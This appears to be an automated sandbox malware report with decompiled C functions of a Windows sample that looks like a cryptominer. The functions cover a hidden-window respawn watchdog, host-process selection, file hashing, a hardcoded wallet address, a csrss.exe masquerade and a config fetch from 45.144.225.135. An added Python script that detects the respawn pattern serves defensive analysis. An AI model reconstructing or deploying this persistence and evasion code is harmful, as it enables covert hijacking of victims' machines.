                                                                                                        			// Watchdog thread. _a4 points at { DWORD pid; WCHAR path[] }: the thread
                                                                                                        			// waits for `pid` to terminate, relaunches `path` without a window and
                                                                                                        			// returns the new process ID as its thread exit code.
                                                                                                        			E01468390(long* _a4) {
                                                                                                        				long _v8;
                                                                                                        				struct _PROCESS_INFORMATION _v24;
                                                                                                        				struct _STARTUPINFOW _v92;
                                                                                                        				int _t17;
                                                                                                        				void* _t35;
                                                                                                        
                                                                                                        				_t35 = OpenProcess(0x1000, 0,  *_a4); // 0x1000 = PROCESS_QUERY_LIMITED_INFORMATION
                                                                                                        				if(_t35 == 0) {
                                                                                                        					ExitThread(0);
                                                                                                        				}
                                                                                                        				while(1) {
                                                                                                        					_v8 = 0;
                                                                                                        					_t17 = GetExitCodeProcess(_t35,  &_v8); // executed
                                                                                                        					if(_t17 == 0 || (0 | _v8 == 0x00000103) == 0) { // 0x103 = STILL_ACTIVE
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					Sleep(0x7d0); // executed; 0x7d0 = 2000 ms polling interval
                                                                                                        				}
                                                                                                        				CloseHandle(_t35);
                                                                                                        				E01461BB0( &_v92, 0, 0x44); // memset-like by its arguments; 0x44 = sizeof(STARTUPINFOW)
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				asm("movups [ebp-0x14], xmm0"); // zeroes the 16-byte PROCESS_INFORMATION (_v24)
                                                                                                        				CreateProcessW( &(_a4[1]), 0, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24); // lpApplicationName = path stored after the PID; 0x8000000 = CREATE_NO_WINDOW
                                                                                                        				CloseHandle(_v24.hThread);
                                                                                                        				CloseHandle(_v24); // first member, i.e. _v24.hProcess
                                                                                                        				ExitThread(_v24.dwProcessId);
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?), ref: 014683A5
                                                                                                        • GetExitCodeProcess.KERNEL32(00000000,?), ref: 014683CD
                                                                                                        • Sleep.KERNEL32(000007D0), ref: 014683E8
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 014683F3
                                                                                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0146842C
                                                                                                        • CloseHandle.KERNEL32(?), ref: 01468435
                                                                                                        • CloseHandle.KERNEL32(?), ref: 0146843A
                                                                                                        • ExitThread.KERNEL32 ref: 0146843F
                                                                                                        • ExitThread.KERNEL32 ref: 01468447
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseExitHandleProcess$Thread$CodeCreateOpenSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 1465093181-0
                                                                                                        • Opcode ID: 11a558fac7276a8d4e2171a970d3cff2b76e97a5d24576860e6d5a0cb1c6ba0f
                                                                                                        • Instruction ID: fee7433a716275ab5919e0dda7cd2252fcba79b456ec3756e6cf3670147eda0b
                                                                                                        • Opcode Fuzzy Hash: 11a558fac7276a8d4e2171a970d3cff2b76e97a5d24576860e6d5a0cb1c6ba0f
                                                                                                        • Instruction Fuzzy Hash: E8114271940319BFEB219BA4DD49F9E7B7CAF04749F140011F604B61E4D6B0AA44CB96
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%
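The API list for E01468390 above is enough to recognise the wait-for-exit-then-relaunch loop without reading the disassembly. The following is an added example, not code from the report or from the sample: it parses API lines in the exact form the report prints them ("Api.MODULE(hex args), ref: address"), then checks for OpenProcess followed by a GetExitCodeProcess/Sleep poll and a CreateProcessW, and decodes the constants the report shows (0x1000 desired access, the 0x7D0 sleep, the 0x08000000 creation flag). The pattern and the field positions it inspects are this example's own choices; the nine input lines are copied from the list above.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# The nine API lines listed for E01468390 above, copied verbatim from the report.
API_LINES = """\
• OpenProcess.KERNEL32(00001000,00000000,?), ref: 014683A5
• GetExitCodeProcess.KERNEL32(00000000,?), ref: 014683CD
• Sleep.KERNEL32(000007D0), ref: 014683E8
• CloseHandle.KERNEL32(00000000), ref: 014683F3
• CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0146842C
• CloseHandle.KERNEL32(?), ref: 01468435
• CloseHandle.KERNEL32(?), ref: 0146843A
• ExitThread.KERNEL32 ref: 0146843F
• ExitThread.KERNEL32 ref: 01468447
"""

# "<Api>.<MODULE>(<hex args or ?>), ref: <hex address>"; the argument list is
# absent for calls the report shows without parameters (ExitThread above).
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)

PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
CREATION_FLAGS = {  # dwCreationFlags bits of CreateProcessW
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]   # None where the report prints '?'
    ref: int


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the report's API bullet lines into ApiCall records, in listed order."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        name, module, raw_args, ref = m.groups()
        args: List[Optional[int]] = []
        if raw_args:
            for a in raw_args.split(","):
                a = a.strip()
                args.append(int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else None)
        calls.append(ApiCall(name, module, args, int(ref, 16)))
    return calls


def decode_creation_flags(value: Optional[int]) -> List[str]:
    """Names of the known dwCreationFlags bits set in value (empty for '?')."""
    if value is None:
        return []
    return [n for bit, n in sorted(CREATION_FLAGS.items()) if value & bit]


def _index_of(calls: List[ApiCall], name: str, start: int = 0) -> Optional[int]:
    for i in range(start, len(calls)):
        if calls[i].name == name:
            return i
    return None


def detect_respawn_watchdog(calls: List[ApiCall]) -> Dict[str, object]:
    """Flag OpenProcess -> GetExitCodeProcess -> Sleep -> CreateProcessW in
    listed (address) order: wait for a PID to die, then relaunch something."""
    findings: Dict[str, object] = {}
    i_open = _index_of(calls, "OpenProcess")
    if i_open is None:
        return findings
    i_poll = _index_of(calls, "GetExitCodeProcess", i_open)
    if i_poll is None:
        return findings
    i_sleep = _index_of(calls, "Sleep", i_poll)
    i_create = _index_of(calls, "CreateProcessW", i_poll)
    if i_sleep is None or i_create is None:
        return findings
    findings["pattern"] = "wait_for_exit_then_relaunch"
    access = calls[i_open].args[0] if calls[i_open].args else None
    if access is not None and access & PROCESS_QUERY_LIMITED_INFORMATION:
        findings["open_access"] = "PROCESS_QUERY_LIMITED_INFORMATION"
    findings["poll_interval_ms"] = calls[i_sleep].args[0]
    cargs = calls[i_create].args
    findings["creation_flags"] = decode_creation_flags(cargs[5] if len(cargs) > 5 else None)
    return findings


if __name__ == "__main__":
    print(detect_respawn_watchdog(parse_api_lines(API_LINES)))
```

Run against the lines above it reports the pattern, a 2000 ms poll interval and CREATE_NO_WINDOW; the same parser can be pointed at any other function's API list in this report, and a function whose list lacks OpenProcess or the poll yields an empty result.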

                                                                                                        Non-executed Functions

                                                                                                        C-Code - Quality: 84%
                                                                                                        			// Host-process selection. With _a4 == 0 it resolves explorer.exe through
                                                                                                        			// E01467EF0; otherwise it walks a process snapshot and stores up to _a12
                                                                                                        			// PIDs into the array at _a8, returning how many were stored. A process is
                                                                                                        			// kept when it lives in a non-zero session and its image name is neither
                                                                                                        			// csrss.exe nor winlogon.exe; if E01468DD0() fails or ProcessIdToSessionId
                                                                                                        			// cannot be resolved, every PID in the snapshot is taken unfiltered.
                                                                                                        			E014680E0(void* __ebx, void* __edi, void* __esi, char _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                        				void* _v8;
                                                                                                        				struct HINSTANCE__* _v12;
                                                                                                        				char _v272; // PROCESSENTRY32.szExeFile
                                                                                                        				intOrPtr _v300; // PROCESSENTRY32.th32ProcessID
                                                                                                        				void* _v308; // PROCESSENTRY32.dwSize
                                                                                                        				struct HINSTANCE__* _t31;
                                                                                                        				void* _t34;
                                                                                                        				struct HINSTANCE__* _t39;
                                                                                                        				void* _t49;
                                                                                                        				void* _t51;
                                                                                                        				void* _t55;
                                                                                                        				void* _t57;
                                                                                                        				void* _t61;
                                                                                                        				intOrPtr* _t62;
                                                                                                        				intOrPtr* _t66;
                                                                                                        				signed int _t69;
                                                                                                        				void* _t72;
                                                                                                        
                                                                                                        				if(_a4 == 0) {
                                                                                                        					return E01467EF0("explorer.exe");
                                                                                                        				} else {
                                                                                                        					_t69 = 0; // number of PIDs stored so far
                                                                                                        					_v308 = 0x128; // sizeof(PROCESSENTRY32) = 296
                                                                                                        					_a4 = 0; // reused below as the session-ID output slot of ProcessIdToSessionId
                                                                                                        					_t61 = CreateToolhelp32Snapshot(2, 0); // 2 = TH32CS_SNAPPROCESS
                                                                                                        					_v8 = _t61;
                                                                                                        					if(_t61 != 0xffffffff) {
                                                                                                        						_t66 = 0;
                                                                                                        						_t31 = LoadLibraryA("kernel32.dll");
                                                                                                        						_v12 = _t31;
                                                                                                        						if(_t31 != 0) {
                                                                                                        							_t66 = GetProcAddress(_t31, "ProcessIdToSessionId"); // resolved dynamically, absent on very old builds
                                                                                                        						}
                                                                                                        						Process32First(_t61,  &_v308);
                                                                                                        						_t34 = E01468DD0();
                                                                                                        						_t62 = _a8;
                                                                                                        						if(_t34 == 0 || _t66 == 0) {
                                                                                                        							L10: // accept the first snapshot entry without filtering
                                                                                                        							_t69 = 1;
                                                                                                        							 *_t62 = _v300;
                                                                                                        						} else {
                                                                                                        							 *_t66(_v300,  &_a4); // ProcessIdToSessionId(pid, &session)
                                                                                                        							if(_a4 != _t69) { // session != 0
                                                                                                        								// E01461740 compares the image name; a non-zero result means "no match"
                                                                                                        								_t55 = E01461740("csrss.exe",  &_v272);
                                                                                                        								_t72 = _t72 + 8;
                                                                                                        								if(_t55 != 0) {
                                                                                                        									_t57 = E01461740("winlogon.exe",  &_v272);
                                                                                                        									_t72 = _t72 + 8;
                                                                                                        									if(_t57 != 0) {
                                                                                                        										goto L10;
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        						while(Process32Next(_v8,  &_v308) != 0) {
                                                                                                        							if(E01468DD0() == 0 || _t66 == 0) {
                                                                                                        								L18: // store the PID; stop once the caller's array is full
                                                                                                        								 *((intOrPtr*)(_t62 + _t69 * 4)) = _v300;
                                                                                                        								_t69 = _t69 + 1;
                                                                                                        								if(_t69 < _a12) {
                                                                                                        									goto L19;
                                                                                                        								}
                                                                                                        							} else {
                                                                                                        								 *_t66(_v300,  &_a4);
                                                                                                        								if(_a4 == 0) {
                                                                                                        									goto L19; // session 0: skip
                                                                                                        								} else {
                                                                                                        									_t49 = E01461740("csrss.exe",  &_v272);
                                                                                                        									_t72 = _t72 + 8;
                                                                                                        									if(_t49 == 0) {
                                                                                                        										goto L19; // csrss.exe: skip
                                                                                                        									} else {
                                                                                                        										_t51 = E01461740("winlogon.exe",  &_v272);
                                                                                                        										_t72 = _t72 + 8;
                                                                                                        										if(_t51 == 0) {
                                                                                                        											goto L19; // winlogon.exe: skip
                                                                                                        										} else {
                                                                                                        											goto L18;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        							goto L20;
                                                                                                        							L19:
                                                                                                        						}
                                                                                                        						L20:
                                                                                                        						CloseHandle(_v8);
                                                                                                        						_t39 = _v12;
                                                                                                        						if(_t39 != 0) {
                                                                                                        							FreeLibrary(_t39);
                                                                                                        						}
                                                                                                        						return _t69; // count of PIDs written to _a8
                                                                                                        					} else {
                                                                                                        						return 0;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}
                                                                                                        0x014680ed
                                                                                                        0x01468261
                                                                                                        0x014680f3
                                                                                                        0x014680f5
                                                                                                        0x014680f7
                                                                                                        0x01468104
                                                                                                        0x0146810c
                                                                                                        0x0146810e
                                                                                                        0x01468114
                                                                                                        0x01468124
                                                                                                        0x01468126
                                                                                                        0x0146812c
                                                                                                        0x01468131
                                                                                                        0x0146813f
                                                                                                        0x0146813f
                                                                                                        0x01468149
                                                                                                        0x0146814e
                                                                                                        0x01468153
                                                                                                        0x01468158
                                                                                                        0x0146819f
                                                                                                        0x014681a5
                                                                                                        0x014681aa
                                                                                                        0x0146815e
                                                                                                        0x01468168
                                                                                                        0x0146816d
                                                                                                        0x0146817b
                                                                                                        0x01468180
                                                                                                        0x01468185
                                                                                                        0x01468193
                                                                                                        0x01468198
                                                                                                        0x0146819d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0146819d
                                                                                                        0x01468185
                                                                                                        0x0146816d
                                                                                                        0x014681bd
                                                                                                        0x014681c7
                                                                                                        0x0146820f
                                                                                                        0x01468215
                                                                                                        0x01468218
                                                                                                        0x0146821c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x014681cd
                                                                                                        0x014681d7
                                                                                                        0x014681dd
                                                                                                        0x00000000
                                                                                                        0x014681df
                                                                                                        0x014681eb
                                                                                                        0x014681f0
                                                                                                        0x014681f5
                                                                                                        0x00000000
                                                                                                        0x014681f7
                                                                                                        0x01468203
                                                                                                        0x01468208
                                                                                                        0x0146820d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0146820d
                                                                                                        0x014681f5
                                                                                                        0x014681dd
                                                                                                        0x00000000
                                                                                                        0x0146821e
                                                                                                        0x0146822d
                                                                                                        0x01468231
                                                                                                        0x01468234
                                                                                                        0x0146823a
                                                                                                        0x01468240
                                                                                                        0x01468243
                                                                                                        0x01468243
                                                                                                        0x01468250
                                                                                                        0x01468116
                                                                                                        0x0146811d
                                                                                                        0x0146811d
                                                                                                        0x01468114

                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,7519F7F0,00000000), ref: 01468107
                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,014667D1,00000002,00000000,7519F7F0,00000000), ref: 01468126
                                                                                                        • GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 01468139
                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 01468149
                                                                                                        • Process32Next.KERNEL32(00001000,00000128,00000000,00000128), ref: 014681B6
                                                                                                        • Process32Next.KERNEL32(00001000,00000128,00001000,00000128,00000000,00000128), ref: 01468228
                                                                                                        • CloseHandle.KERNEL32(00001000,00001000,00000128,00000000,00000128), ref: 01468234
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 01468243
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process32$LibraryNext$AddressCloseCreateFirstFreeHandleLoadProcSnapshotToolhelp32
                                                                                                        • String ID: ProcessIdToSessionId$csrss.exe$csrss.exe$explorer.exe$kernel32.dll$winlogon.exe$winlogon.exe
                                                                                                        • API String ID: 2254598907-4289567422
                                                                                                        • Opcode ID: 75e54585ab597881e2a8c14eaa3f56565938607f13dac17787e80b533d592846
                                                                                                        • Instruction ID: 6426e4b32cada91637845f6a95382c694a5ca80f23e0158a4b6997380e6871cb
                                                                                                        • Opcode Fuzzy Hash: 75e54585ab597881e2a8c14eaa3f56565938607f13dac17787e80b533d592846
                                                                                                        • Instruction Fuzzy Hash: D641B97590031AABEF11AF65DC41BEA7BACAF6435DF1400ABED04D2260E771CA54CB93
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 34%
                                                                                                        			E01468B20(WCHAR* _a4, intOrPtr _a8) {
                                                                                                        				long* _v8;
                                                                                                        				int _v12;
                                                                                                        				long _v16;
                                                                                                        				int _v20;
                                                                                                        				char _v24;
                                                                                                        				char _v56;
                                                                                                        				void _v1080;
                                                                                                        				char _t39;
                                                                                                        				long** _t42;
                                                                                                        				int* _t43;
                                                                                                        				int _t46;
                                                                                                        				char* _t51;
                                                                                                        				void* _t60;
                                                                                                        				intOrPtr* _t69;
                                                                                                        				int _t70;
                                                                                                        				long _t72;
                                                                                                        				signed int _t73;
                                                                                                        				signed int _t75;
                                                                                                        				intOrPtr _t80;
                                                                                                        				void* _t82;
                                                                                                        				void* _t87;
                                                                                                        
                                                                                                        				asm("movups xmm0, [0x146aa14]");
                                                                                                        				_t39 =  *0x146aa24; // 0x0
                                                                                                        				_v8 = 0;
                                                                                                        				_v12 = 0;
                                                                                                        				_v16 = 0;
                                                                                                        				_v20 = 0;
                                                                                                        				asm("movups [ebp-0x24], xmm0");
                                                                                                        				_v24 = _t39;
                                                                                                        				_t82 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x8000000, 0);
                                                                                                        				if(_t82 == 0xffffffff) {
                                                                                                        					L3:
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					_t42 =  &_v8;
                                                                                                        					__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000);
                                                                                                        					if(_t42 != 0) {
                                                                                                        						_t43 =  &_v12;
                                                                                                        						__imp__CryptCreateHash(_v8, 0x8003, 0, 0, _t43);
                                                                                                        						if(_t43 != 0) {
                                                                                                        							_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, 0);
                                                                                                        							if(_t46 == 0) {
                                                                                                        								L11:
                                                                                                        								_push(0);
                                                                                                        								goto L12;
                                                                                                        							} else {
                                                                                                        								_t69 = __imp__CryptHashData;
                                                                                                        								while(1) {
                                                                                                        									_t72 = _v16;
                                                                                                        									if(_t72 == 0) {
                                                                                                        										break;
                                                                                                        									}
                                                                                                        									_t60 =  *_t69(_v12,  &_v1080, _t72, 0);
                                                                                                        									_push(0);
                                                                                                        									if(_t60 == 0) {
                                                                                                        										L12:
                                                                                                        										CryptReleaseContext(_v8);
                                                                                                        										__imp__CryptDestroyHash(_v12);
                                                                                                        										CloseHandle(_t82);
                                                                                                        										L13:
                                                                                                        										return 0;
                                                                                                        									} else {
                                                                                                        										_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, ??);
                                                                                                        										if(_t46 != 0) {
                                                                                                        											continue;
                                                                                                        										} else {
                                                                                                        											goto L11;
                                                                                                        										}
                                                                                                        									}
                                                                                                        									goto L20;
                                                                                                        								}
                                                                                                        								if(_t46 == 0) {
                                                                                                        									goto L11;
                                                                                                        								} else {
                                                                                                        									_v20 = 0x10;
                                                                                                        									_t51 =  &_v56;
                                                                                                        									__imp__CryptGetHashParam(_v12, 2, _t51,  &_v20, 0);
                                                                                                        									if(_t51 == 0) {
                                                                                                        										goto L13;
                                                                                                        									} else {
                                                                                                        										_t70 = _v20;
                                                                                                        										_t75 = 0;
                                                                                                        										if(_t70 != 0) {
                                                                                                        											_t80 = _a8;
                                                                                                        											asm("o16 nop [eax+eax]");
                                                                                                        											do {
                                                                                                        												_t73 =  *(_t87 + _t75 - 0x34) & 0x000000ff;
                                                                                                        												 *((char*)(_t80 + _t75 * 2)) =  *(_t87 + (_t73 >> 4) - 0x24) & 0x000000ff;
                                                                                                        												 *((char*)(_t80 + 1 + _t75 * 2)) =  *(_t87 + (_t73 & 0x0000000f) - 0x24) & 0x000000ff;
                                                                                                        												_t75 = _t75 + 1;
                                                                                                        											} while (_t75 < _t70);
                                                                                                        										}
                                                                                                        										__imp__CryptDestroyHash(_v12);
                                                                                                        										CryptReleaseContext(_v8, 0);
                                                                                                        										CloseHandle(_t82);
                                                                                                        										return 1;
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							CloseHandle(_t82);
                                                                                                        							CryptReleaseContext(_v8, 0);
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						CloseHandle(_t82);
                                                                                                        						goto L3;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L20:
                                                                                                        			}

                                                                                                        0x01468b29
                                                                                                        0x01468b30
                                                                                                        0x01468b4b
                                                                                                        0x01468b52
                                                                                                        0x01468b59
                                                                                                        0x01468b60
                                                                                                        0x01468b67
                                                                                                        0x01468b6b
                                                                                                        0x01468b74
                                                                                                        0x01468b79
                                                                                                        0x01468b9b
                                                                                                        0x01468ba1
                                                                                                        0x01468b7b
                                                                                                        0x01468b86
                                                                                                        0x01468b8a

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(0146363E,80000000,00000001,00000000,00000003,08000000,00000000), ref: 01468B6E
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 01468B8A
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 01468B95
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 01468BB2
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 01468BBD
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01468BC8
                                                                                                        • ReadFile.KERNEL32(00000000,?,00000400,00000000,00000000,?,00000000), ref: 01468BF0
                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 01468C14
                                                                                                        • ReadFile.KERNEL32(00000000,?,00000400,00000000,00000000,?,00000000), ref: 01468C2D
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 01468C38
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 01468C41
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 01468C48
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,?,00000000,00000000,?,00000000), ref: 01468C71
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 01468CB6
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 01468CC1
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 01468CC8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Hash$CloseContextHandle$FileRelease$CreateDestroyRead$AcquireDataParam
                                                                                                        • String ID:
                                                                                                        • API String ID: 2794010843-0
                                                                                                        • Opcode ID: c16684ed658cbe0f33a50d58310178249e99d8258054f4fb7f108588035e333c
                                                                                                        • Instruction ID: c07523fc0bf3e764f29e3ec9912ee4ecdb6971eea2a9947f96e62cfe4e95853c
                                                                                                        • Opcode Fuzzy Hash: c16684ed658cbe0f33a50d58310178249e99d8258054f4fb7f108588035e333c
                                                                                                        • Instruction Fuzzy Hash: 3E51B471A01219BFEB218FA4DD45FEE7BBCEF04708F100066FA04E61A4D7B15A458B66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 93%
                                                                                                        			_entry_() {
                                                                                                        				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				char _v20;
                                                                                                        				int _v24;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                        				long _v32;
                                                                                                        				long _v36;
                                                                                                        				char _v38;
                                                                                                        				short _v40;
                                                                                                        				char _v48;
                                                                                                        				char _v72;
                                                                                                        				char _v592;
                                                                                                        				char _v1112;
                                                                                                        				char _v2136;
                                                                                                        				char _v3160;
                                                                                                        				void _v7224;
                                                                                                        				long _t56;
                                                                                                        				long _t66;
                                                                                                        				void* _t72;
                                                                                                        				void* _t74;
                                                                                                        				void* _t75;
                                                                                                        				void* _t76;
                                                                                                        				void* _t77;
                                                                                                        				void* _t82;
                                                                                                        				void* _t84;
                                                                                                        				void* _t89;
                                                                                                        				void* _t90;
                                                                                                        				void* _t91;
                                                                                                        				intOrPtr _t93;
                                                                                                        				void* _t94;
                                                                                                        				long _t96;
                                                                                                        				long _t99;
                                                                                                        				void* _t102;
                                                                                                        				char _t110;
                                                                                                        				char _t114;
                                                                                                        				char _t117;
                                                                                                        				char _t119;
                                                                                                        				void* _t125;
                                                                                                        				void* _t137;
                                                                                                        				void* _t139;
                                                                                                        				void* _t140;
                                                                                                        				signed int _t148;
                                                                                                        				char _t150;
                                                                                                        				void* _t153;
                                                                                                        				void* _t158;
                                                                                                        				intOrPtr _t160;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _t161;
                                                                                                        				void* _t166;
                                                                                                        				struct _SECURITY_ATTRIBUTES* _t168;
                                                                                                        				intOrPtr _t169;
                                                                                                        				void* _t171;
                                                                                                        				void* _t174;
                                                                                                        				void* _t175;
                                                                                                        				void* _t176;
                                                                                                        				void* _t177;
                                                                                                        				void* _t178;
                                                                                                        				void* _t179;
                                                                                                        				void* _t180;
                                                                                                        				void* _t181;
                                                                                                        				void* _t182;
                                                                                                        				void* _t183;
                                                                                                        				void* _t185;
                                                                                                        				void* _t186;
                                                                                                        				void* _t187;
                                                                                                        				void* _t188;
                                                                                                        				void* _t189;
                                                                                                        				void* _t196;
                                                                                                        				void* _t223;
                                                                                                        				void* _t225;
                                                                                                        				void* _t226;
                                                                                                        				void* _t234;
                                                                                                        
                                                                                                        				_v8 = 0;
                                                                                                        				_v12 = 0;
                                                                                                        				_v28 = 0;
                                                                                                        				_t56 = GetTickCount();
                                                                                                        				_t150 = 0;
                                                                                                        				_v32 = _t56;
                                                                                                        				_v36 = _t56;
                                                                                                        				_v24 = 0;
                                                                                                        				 *0x1632df4 = 0;
                                                                                                        				E01461670(0x1632128, 0, 0xcc8);
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				asm("movq [ebp-0x10], xmm0");
                                                                                                        				E01461BB0( &_v7224, 0, 0xfe0);
                                                                                                        				memcpy("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW",  &_v7224, 0x3f8 << 2);
                                                                                                        				_t152 = 0;
                                                                                                        				SetErrorMode(SetErrorMode(2) | 0x00000002);
                                                                                                        				E014617E0(0x163206c, "e9c1286a28d82a2d0ee6");
                                                                                                        				_t174 = _t171 + 0x2c;
                                                                                                        				if(CreateMutexA(0, 0, 0x163206c) == 0) {
                                                                                                        					ExitProcess(0x1e);
                                                                                                        				}
                                                                                                        				_t158 = GetLastError;
                                                                                                        				_t66 = GetLastError();
                                                                                                        				_t191 = _t66 - 0xb7;
                                                                                                        				if(_t66 == 0xb7) {
                                                                                                        					ExitProcess(0x1f);
                                                                                                        				}
                                                                                                        				E01463220(0, SetErrorMode, _t191);
                                                                                                        				_t166 = CommandLineToArgvW(GetCommandLineW(),  &_v24);
                                                                                                        				if(_t166 != 0 && _v24 > 1) {
                                                                                                        					_t148 = E014619C0( *((intOrPtr*)(_t166 + 4)), L"--show-window");
                                                                                                        					_t174 = _t174 + 8;
                                                                                                        					asm("sbb eax, eax");
                                                                                                        					 *0x1631bb8 =  *0x1631bb8 &  ~_t148;
                                                                                                        				}
                                                                                                        				LocalFree(_t166);
                                                                                                        				_t72 = E01461000(_t152, _t158, _t166,  *0x1631314);
                                                                                                        				_t175 = _t174 + 4;
                                                                                                        				_t195 = _t72;
                                                                                                        				if(_t72 != 0) {
                                                                                                        					E01468070(_t152, _t195, "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
                                                                                                        					_t176 = _t175 + 4;
                                                                                                        					_t196 =  *0x1631bc0 - _t150; // 0x0
                                                                                                        					if(_t196 != 0) {
                                                                                                        						E014617E0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW", "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
                                                                                                        						_t176 = _t176 + 8;
                                                                                                        					}
                                                                                                        					_t74 = E01461600(0x163204c, "LKBNMTFJgl");
                                                                                                        					_t177 = _t176 + 8;
                                                                                                        					if(_t74 != 0) {
                                                                                                        						_t75 = E01461600("csrss.exe", "csrss.exe");
                                                                                                        						_t178 = _t177 + 8;
                                                                                                        						if(_t75 != 0) {
                                                                                                        							_t76 = E01461600("viTRMUuKeV", "viTRMUuKeV");
                                                                                                        							_t179 = _t178 + 8;
                                                                                                        							if(_t76 != 0) {
                                                                                                        								_t77 = E01467FA0(_t152, "C:\ProgramData\LKBNMTFJgl", 0x146aae0, 0x23);
                                                                                                        								_t180 = _t179 + 0xc;
                                                                                                        								if(_t77 != 0) {
                                                                                                        									E01461970("C:\ProgramData\LKBNMTFJgl", "\\");
                                                                                                        									E01461970("C:\ProgramData\LKBNMTFJgl", 0x163204c);
                                                                                                        									_t181 = _t180 + 0x10;
                                                                                                        									if(CreateDirectoryW(?str?, 0) != 0 || GetLastError() == 0xb7) {
                                                                                                        										if(E01468DD0() != 0 &&  *0x163210c == 1) {
                                                                                                        											 *0x163211c = CreateThread(0, 0, E01468450, 0, 0, 0);
                                                                                                        										}
                                                                                                        										_t82 = E014617B0("FALSE", "http://45.144.225.135/config.txt");
                                                                                                        										_t182 = _t181 + 8;
                                                                                                        										if(_t82 == 0) {
                                                                                                        											L33:
                                                                                                        											_t84 = E01463150( &_v1112);
